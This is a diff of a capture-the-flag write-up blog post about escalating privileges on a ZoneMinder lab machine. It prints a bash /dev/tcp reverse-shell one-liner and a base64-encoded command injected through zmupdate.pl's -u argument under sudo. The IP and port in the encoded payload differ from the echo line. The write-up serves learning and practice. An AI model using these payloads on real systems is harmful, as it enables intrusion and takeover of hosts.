W1nz4c4r/W1nz4c4r.github.io/_posts/2024-05-17-htb-writeup-Survellance.md

 * ZoneMinderPassword2023

-After reading for a while the codes and not finding much i encounter this code snippet from **zmupdate.pl**
+After reading for a while I was identify **zmupdate.pl** as a vulnerable script and craft a payload to exploit it.
+The script takes user input directly into a bash connection query, making it susceptible to command injection.

 ![Alt text](/assets/images/htb-writeup-survellance/surv14.png)

-the important part of this code is that the *user input is being put straight into the next sql (bash connection query)* so we can alter its behaviour; For this I encoded the following code in base64.
+To exploit this, we create a payload that provides a reverse shell.
+First, we encode the payload in base64 to safely pass it as a command:

 ```bash
 echo  "bash -c 'bash -i >& /dev/tcp/10.10.14.35/443 0>&1' " | base64 -w0
 ```
-NOW I TRY TO send the payload
+NOW I send the payload:

 ```bash
 sudo /usr/bin/zmupdate.pl -v 1.19.0 -u ';echo "YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMy8xMjM0IDA+JjEnIAo=" |base64 -d |bash;'